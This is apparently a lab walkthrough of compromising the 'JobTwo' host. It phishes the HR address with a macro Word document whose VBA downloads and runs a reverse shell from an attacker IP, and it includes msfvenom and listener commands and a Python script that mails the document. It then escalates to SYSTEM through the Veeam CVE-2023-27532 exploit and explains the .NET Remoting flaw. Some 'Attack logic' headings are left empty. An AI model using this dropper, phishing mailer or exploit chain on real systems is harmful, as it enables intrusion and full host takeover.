This article walks through a penetration test of the "JobTwo" target (10.129.238.35, domain job2.vl). Information gathering with Nmap identifies the open ports and services, among them an hMailServer SMTP service and a recruitment website that asks applicants to mail their CV as a Word document. A macro-enabled .docm whose AutoOpen VBA macro downloads and runs a reverse shell is mailed to hr@job2.vl, which yields a shell as job2\julian. Enumeration on the host shows Veeam Backup & Replication running as SYSTEM; CVE-2023-27532, unauthenticated access to the backup service's .NET Remoting endpoint on TCP 9401, is then exploited from the foothold with the VeeamHax proof of concept to obtain NT AUTHORITY\SYSTEM. The closing section explains the .NET Remoting and BinaryFormatter background behind the bug and why a service that trusts localhost callers is a local privilege-escalation primitive even when a firewall hides it from the network.

Information Gathering

# Nmap 7.98 scan initiated Sun Jan  4 14:03:38 2026 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.129.238.35
Nmap scan report for 10.129.238.35
Host is up (0.17s latency).
Not shown: 985 filtered tcp ports (no-response)
PORT      STATE SERVICE              VERSION
22/tcp    open  ssh                  OpenSSH for_Windows_9.5 (protocol 2.0)
25/tcp    open  smtp                 hMailServer smtpd
| smtp-commands: JOB2, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp    open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
111/tcp   open  rpcbind
135/tcp   open  msrpc                Microsoft Windows RPC
139/tcp   open  netbios-ssn          Microsoft Windows netbios-ssn
443/tcp   open  ssl/https?
| tls-alpn:
|   h2
|_  http/1.1
| ssl-cert: Subject: commonName=www.job2.vl
| Subject Alternative Name: DNS:job2.vl, DNS:www.job2.vl
| Issuer: commonName=www.job2.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-05-09T13:31:40
| Not valid after:  2122-05-09T13:41:37
| MD5:     c9f2 9528 e037 427f 18a4 25df 8a09 9bcb
| SHA-1:   a8ea cfdd 9e76 ba15 d11e 9b86 90b3 91c0 a6d8 6084
|_SHA-256: db18 1035 4d3e bc36 30f4 bf54 0f97 e545 b58c de74 e66a 54f8 fefc 425b b1dc 4afb
|_ssl-date: TLS randomness does not represent time
445/tcp   open  microsoft-ds?
1063/tcp  open  rpcbind
2049/tcp  open  rpcbind
3389/tcp  open  ms-wbt-server        Microsoft Terminal Services
| ssl-cert: Subject: commonName=JOB2
| Issuer: commonName=JOB2
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-26T11:44:40
| Not valid after:  2026-04-27T11:44:40
| MD5:     bf8d 2c65 9d12 408e 3c34 855e 2d4c c869
| SHA-1:   8c1b 5175 aa80 1ba5 730d 4ba2 71a6 62a5 c31a b834
|_SHA-256: 3e3c 7325 baeb 35f9 1501 ab98 6577 a9f9 299c ab16 5bc2 97b8 0c9d c27e fa0b 9a9a
|_ssl-date: 2026-01-04T15:06:32+00:00; +1h00m00s from scanner time.
5985/tcp  open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
10001/tcp open  msexchange-logcopier Microsoft Exchange 2010 log copier
10002/tcp open  msexchange-logcopier Microsoft Exchange 2010 log copier
10003/tcp open  storagecraft-image   StorageCraft Image Manager
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.081 days (since Sun Jan  4 12:09:36 2026)
TCP Sequence Prediction: Difficulty=249 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: JOB2; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2026-01-04T15:05:52
|_  start_date: N/A
|_clock-skew: mean: 59m59s, deviation: 0s, median: 59m59s

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan  4 14:06:39 2026 -- 1 IP address (1 host up) scanned in 180.97 seconds

Vulnerability Analysis

Two findings from the scan shape the attack. 25/tcp runs hMailServer, so the host accepts inbound mail, and the certificate on 443/tcp names job2.vl and www.job2.vl, so those names go into /etc/hosts before browsing. Opening https://www.job2.vl/ shows a job advert with the instruction:

"If you are interested in this position, please send your CV to hr@job2.vl as a Microsoft Word Document."

Exploitation (User Flag)

The site asks for Word documents at an address that someone presumably opens, so the delivery vector is a macro. Create a macro-enabled Word file (.docm; the plain .docx container cannot carry a VBA project), press Alt+F11 to open the VBA editor and add an AutoOpen macro. It uses the curl.exe that ships with current Windows releases to fetch the payload and then runs it:

Sub AutoOpen()
    ' Download the stager with Windows' built-in curl.exe and wait for it to
    ' finish (Shell() returns immediately, so two Shell() calls race and the
    ' document then has to be sent twice: once to download, once to execute).
    Dim wsh As Object
    Set wsh = CreateObject("WScript.Shell")
    wsh.Run "curl 10.10.16.21/shell.exe -o C:\Windows\tasks\shell.exe", 0, True
    wsh.Run "C:\Windows\tasks\shell.exe", 0, False
End Sub

C:\Windows\Tasks is used as the drop directory because it is writable by ordinary users on a default install. AutoOpen only fires once the recipient enables macros, so the document has to look like a plausible CV.

On the attacking machine, generate shell.exe (the reverse shell the macro downloads), serve it over HTTP on port 80, which is where the macro fetches http://10.10.16.21/shell.exe from, and start a listener on 443 before sending the mail:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.21 LPORT=443 -f exe -o shell.exe
python3 -m http.server 80
nc -lvnp 443

Port 443 is chosen for the callback because outbound HTTPS is rarely filtered. Send the document to the HR address through the target's own hMailServer; as the command shows, no credentials or TLS are needed because the server accepts mail for its local domain (-s job2.vl resolves through the hosts entry added earlier):

sendemail -s job2.vl -f "Neobee@gmail.htb" -t hr@job2.vl -m "hey pls check my cv http://10.10.16.21/" -a 1.docm -o tls=no

When the document is opened and macros are enabled, the listener receives a shell as job2\julian.
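The delivery step above, as an added example that is not part of the original writeup: a Python smtplib equivalent of the sendemail command, together with the check a mail gateway (or the attacker, before sending) can run to tell a macro-carrying .docm from a plain document. It assumes what the writeup's command relies on, namely that the target's hMailServer answers as job2.vl on TCP 25 and accepts mail for hr@job2.vl without authentication or TLS; the stub document builder is a constructed stand-in so the module runs offline, and the sender address and subject are arbitrary.

```python
"""Mailing the macro-enabled CV: an smtplib equivalent of the sendemail step.

Added example, not part of the original writeup. Assumptions: the target's
hMailServer is reachable as job2.vl on TCP 25 and accepts mail for hr@job2.vl
with no AUTH and no STARTTLS. build_stub_docm() is a constructed stand-in for
a Word-produced file so the checks can run offline.
"""
import io
import smtplib
import zipfile
from email.message import EmailMessage

# Content type Word registers for macro-enabled documents.
DOCM_MAINTYPE, DOCM_SUBTYPE = "application", "vnd.ms-word.document.macroEnabled.12"


def has_vba_project(docm_bytes: bytes) -> bool:
    """A .docm is an OOXML zip; the macro code lives in word/vbaProject.bin.

    Its presence is what separates a macro document from a harmless .docx,
    whatever file extension the sender chose.
    """
    with zipfile.ZipFile(io.BytesIO(docm_bytes)) as package:
        return "word/vbaProject.bin" in package.namelist()


def build_stub_docm(with_macro: bool) -> bytes:
    """Constructed stand-in for a Word package (just enough structure for the checks)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as package:
        package.writestr("[Content_Types].xml", "<Types/>")
        package.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            package.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0stub")
    return buf.getvalue()


def build_message(sender: str, recipient: str, body: str,
                  filename: str, docm_bytes: bytes) -> EmailMessage:
    """Assemble the multipart message with the document attached."""
    if not has_vba_project(docm_bytes):
        raise ValueError(f"{filename} carries no VBA project; the macro would never run")
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = "Application for the open position"
    msg.set_content(body)
    msg.add_attachment(docm_bytes, maintype=DOCM_MAINTYPE, subtype=DOCM_SUBTYPE,
                       filename=filename)
    return msg


def send(msg: EmailMessage, smtp_host: str = "job2.vl", port: int = 25) -> dict:
    """Deliver over a plain SMTP session (no STARTTLS, no AUTH).

    Returns smtplib's per-recipient refusal dict; empty means the server
    accepted the message for every recipient.
    """
    with smtplib.SMTP(smtp_host, port, timeout=30) as smtp:
        smtp.ehlo()
        return smtp.send_message(msg)


if __name__ == "__main__":
    with open("1.docm", "rb") as fh:
        document = fh.read()
    message = build_message("Neobee@gmail.htb", "hr@job2.vl",
                            "hey pls check my cv", "cv.docm", document)
    refused = send(message)
    print("accepted by server" if not refused else f"refused: {refused}")
```

The attachment is sent with the macro-enabled content type rather than application/octet-stream so that the recipient's client treats it as an ordinary Word document; the same has_vba_project() test, run on inbound mail, is the cheapest gateway control against this delivery technique.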

Privilege Escalation (Root Flag)

Start with the local accounts:

net users

User accounts for \\

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Ferdinand
Guest                    Julian                   svc_veeam
WDAGUtilityAccount
The command completed with one or more errors.

The svc_veeam account suggests Veeam Backup & Replication is installed. A backup product is always worth a closer look from a foothold: it runs with high privileges and stores credentials for every system it backs up.

Confirm that Veeam is actually running, and which process hosts which service:

tasklist /svc | findstr /i "veeam"
sqlservr.exe                  2464 MSSQL$VEEAMSQL2016
sqlceip.exe                   2764 SQLTELEMETRY$VEEAMSQL2016
Veeam.Backup.Agent.Config     3472 VeeamDistributionSvc
VeeamFilesysVssSvc.exe        3480 VeeamFilesysVssSvc
VeeamDeploymentSvc.exe        3496 VeeamDeploySvc
VeeamTransportSvc.exe         3504 VeeamTransportSvc
VeeamNFSSvc.exe               3512 VeeamNFSSvc
Veeam.Guest.Interaction.P     4008 N/A
Veeam.Backup.Service.exe      3120 VeeamBackupSvc
Veeam.Backup.BrokerServic     6392 VeeamBrokerSvc
Veeam.Backup.ExternalInfr      944 N/A
Veeam.Backup.Manager.exe      3928 N/A
Veeam.Backup.WmiServer.ex     8692 N/A
Veeam.Backup.CatalogDataS     9144 VeeamCatalogSvc
Veeam.Backup.CloudService     7368 VeeamCloudSvc
Veeam.Backup.UIServer.exe     8392 N/A
Veeam.Backup.MountService     7256 VeeamMountSvc

Veeam.Backup.Service.exe (PID 3120, service VeeamBackupSvc) is the process that hosts the remoting endpoint targeted by CVE-2023-27532. The install also brings its own SQL Server instance (MSSQL$VEEAMSQL2016), which holds the Veeam configuration database and the credentials the vulnerability was originally reported for leaking.

The backup service exposes a .NET Remoting endpoint (TCP 9401 by default) that, in unpatched builds, accepts calls without authentication: CVE-2023-27532 (Veeam KB4424, fixed in 12 P20230223 and 11a P20230227). A perimeter firewall would hide that port from the outside, but from the julian shell it is reachable on 127.0.0.1, so the bug can be used locally as a privilege escalation. Before relying on it, confirm the installed build predates the fix, for example from the file version of C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.Service.exe.

The VeeamHax proof of concept is a small .NET program that needs three Veeam assemblies beside it to speak the service's remoting types (the same DLLs ship in the target's own Veeam installation directory). Upload the four files to the target:

07/10/2024  11:34 AM         1,841,232 Veeam.Backup.Common.dll
07/10/2024  11:34 AM           430,160 Veeam.Backup.Interaction.MountService.dll
07/10/2024  11:34 AM         4,444,240 Veeam.Backup.Model.dll
07/10/2024  11:34 AM             7,168 VeeamHax.exe

Run it against the loopback endpoint, passing the same reverse shell as the command to execute. Start a fresh listener first: nc closes its listening socket once the first session is accepted (unless started with -k), so the second callback on 443 needs a new nc -lvnp 443.

C:\Users\Julian\Documents>.\VeeamHax.exe --target 127.0.0.1 --cmd C:\Windows\tasks\shell.exe
Targeting 127.0.0.1:9401

The callback arrives as the account the Veeam service itself runs under:

C:\WINDOWS\system32>whoami
nt authority\system

Lessons Learned

1. Core Background: The Forgotten .NET Remoting

To understand this vulnerability, one must first understand .NET Remoting.

  • What is it? A technology that shipped with the first .NET Framework (around 2002) for calling methods on objects that live in another process or on another machine. Think of it as an early, .NET-specific form of remote procedure call (RPC): the client holds a proxy, calls a method on it, and the call, its arguments and the return value are serialized across a channel (TCP, HTTP or IPC).
  • Why is it dangerous? Microsoft has treated it as legacy for years, recommends WCF (and today gRPC or ASP.NET Core) instead, and never ported it to .NET Core/.NET 5+. The default TCP channel moves call arguments with BinaryFormatter, so every exposed endpoint is a deserialization sink, and the channel authenticates nobody unless the application turns that on (secure=true on the channel) or checks the caller inside every method.

Veeam's mistake: Veeam Backup & Replication (VBR) exposes .NET Remoting endpoints from Veeam.Backup.Service.exe so that its components (the UI console, the mount service and others) can talk to the backup service. Besides the main service port 9392, the listener relevant to CVE-2023-27532 is the one on TCP 9401, which is what the exploit above connected to; in the vulnerable builds, some of the methods reachable through it were callable without any authentication.

2. Vulnerability Cause: Unauthenticated API Exposure

CVE-2023-27532 is at heart a missing-authentication bug on that remoting endpoint. Two consequences follow from it:

A. Credential Dumping

This is the impact Veeam's advisory describes: an unauthenticated caller can ask the backup service for the credentials stored in the configuration database.

  1. Normal process: an administrator logs in through the console; the backup service verifies the identity and then serves configuration and credential data on the administrator's behalf.
  2. Vulnerability point: the service exposes the internal interface that the console and other components use on port 9401. The developers assumed that only trusted components would ever connect to it, so certain methods did no authentication of their own. Anyone who can open a TCP connection to the port can invoke them and retrieve the stored credentials (the advisory describes them as encrypted).
  3. Attack logic:

B. Remote Code Execution (RCE)

This is the path used above (a SYSTEM shell through port 9401). Once the endpoint accepts calls from anyone, the only question is what the reachable methods let a caller do, and the VeeamHax proof of concept turns that into running an arbitrary command as the service account.

  1. Principle: .NET Remoting's TCP channel transports calls with BinaryFormatter. When the service receives a message, it deserializes the client-supplied bytes back into objects before any method logic, and therefore before any authentication check inside that method, gets to run.
  2. Dangerous BinaryFormatter: Microsoft states that BinaryFormatter is insecure and cannot be made secure (it was removed outright in .NET 9). It instantiates whatever types the stream names and runs their deserialization callbacks, so a crafted object graph (the gadget chains tools such as ysoserial.net generate) executes attacker code during reconstruction, regardless of what the called method was supposed to do.
  3. Attack logic:

3. Why Did the Attack Succeed from Localhost?

This comes down to where the trust boundary actually sits.

  • External defense: in a real enterprise deployment the perimeter or host firewall usually blocks 9392/9401 from the outside (blocking external connections to 9401 was also the temporary mitigation Veeam's advisory suggested), so a remote attacker cannot reach the endpoint directly.
  • Missing internal defense: a firewall does nothing for connections that originate on the host. The endpoint accepted calls from 127.0.0.1 with no authentication, and the process answering them runs as SYSTEM, so any local user, including the low-privileged julian obtained through phishing, had a one-step path to SYSTEM. Binding a service to loopback is not an authorization control; only the patch (or authentication on the endpoint) removes the bug, and until it is applied the service has to be treated as a local privilege-escalation primitive.
  • Attack path:
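The two points above, that the Veeam endpoint was reachable from the julian shell and that a loopback binding protects nothing against a local user, generalise to a triage step worth running on any Windows foothold: which services run as SYSTEM and expose a TCP listener, loopback included. The script below is an added example (not from the original writeup and not Veeam's code) that correlates the outputs of netstat -ano, tasklist /svc and a Win32_Service CSV export. The sample outputs are constructed: the PIDs and service names mirror the writeup's tasklist listing, while the ports, addresses and accounts are assumed.

```python
"""Triage local privilege-escalation candidates on a Windows foothold.

Added example, not part of the original writeup. It correlates three outputs a
low-privileged shell can collect: `netstat -ano`, `tasklist /svc` and
`Get-CimInstance Win32_Service | Select-Object Name,ProcessId,StartName | ConvertTo-Csv -NoTypeInformation`.
The samples are constructed: PIDs and service names mirror the writeup's
tasklist listing; ports, addresses and accounts are assumed.
"""
import csv
import io
import re
from dataclasses import dataclass

NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:9392           0.0.0.0:0              LISTENING       3120
  TCP    127.0.0.1:9401         0.0.0.0:0              LISTENING       3120
  TCP    127.0.0.1:1433         0.0.0.0:0              LISTENING       2464
  TCP    10.129.238.35:445      10.10.16.21:51234      ESTABLISHED     4
  TCP    [::]:6160              [::]:0                 LISTENING       3496
"""

TASKLIST_SAMPLE = """\
Image Name                     PID Services
========================= ======== ============================================
System                           4 N/A
sqlservr.exe                  2464 MSSQL$VEEAMSQL2016
Veeam.Backup.Service.exe      3120 VeeamBackupSvc
VeeamDeploymentSvc.exe        3496 VeeamDeploySvc
"""

SERVICES_CSV_SAMPLE = """\
"Name","ProcessId","StartName"
"MSSQL$VEEAMSQL2016","2464","NT Service\\MSSQL$VEEAMSQL2016"
"VeeamBackupSvc","3120","LocalSystem"
"VeeamDeploySvc","3496","LocalSystem"
"""

SYSTEM_ACCOUNTS = {"localsystem", "nt authority\\system"}
LOOPBACK = {"127.0.0.1", "::1"}


@dataclass(frozen=True)
class Listener:
    address: str
    port: int
    pid: int


def parse_netstat(text: str) -> list[Listener]:
    """Listening TCP sockets from `netstat -ano`; IPv6 addresses come bracketed."""
    found = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[0].startswith("TCP") and parts[3] == "LISTENING":
            address, port = parts[1].rsplit(":", 1)
            found.append(Listener(address.strip("[]"), int(port), int(parts[4])))
    return found


def parse_tasklist_svc(text: str) -> dict[int, tuple[str, list[str]]]:
    """PID -> (image name, hosted service names) from `tasklist /svc`."""
    result = {}
    for line in text.splitlines():
        match = re.match(r"^(\S.*?)\s+(\d+)\s+(\S.*)$", line)
        if match:  # header, separator and blank lines have no PID column
            image, pid, services = match.group(1), int(match.group(2)), match.group(3)
            result[pid] = (image, [] if services == "N/A" else [s.strip() for s in services.split(",")])
    return result


def parse_service_accounts(csv_text: str) -> dict[str, str]:
    """Service name -> logon account from the Win32_Service CSV export."""
    return {row["Name"]: row["StartName"] for row in csv.DictReader(io.StringIO(csv_text))}


def privesc_candidates(netstat: str, tasklist: str, services_csv: str) -> list[dict]:
    """Listeners hosted by a service that runs as SYSTEM.

    Loopback-only bindings are kept on purpose: they stop remote attackers, not a
    user who already has a shell, which is how 127.0.0.1:9401 was reached above.
    """
    pids, accounts = parse_tasklist_svc(tasklist), parse_service_accounts(services_csv)
    found = []
    for listener in parse_netstat(netstat):
        image, services = pids.get(listener.pid, ("?", []))
        for service in services:
            account = accounts.get(service, "?")
            if account.lower() in SYSTEM_ACCOUNTS:
                found.append({"port": listener.port, "bind": listener.address, "pid": listener.pid,
                              "image": image, "service": service, "account": account,
                              "local_only": listener.address in LOOPBACK})
    return sorted(found, key=lambda c: c["port"])
```

On the constructed sample this flags 9392 and 9401 (both hosted by Veeam.Backup.Service.exe as LocalSystem) and the IPv6 listener of VeeamDeploySvc, while ignoring the SQL instance, which runs under a virtual service account, and WinRM on 5985, which lives in the System process without a service name. The local_only flag is informational, not a mitigating factor: a 127.0.0.1 listener is exactly as reachable from a phished user's session as a 0.0.0.0 one.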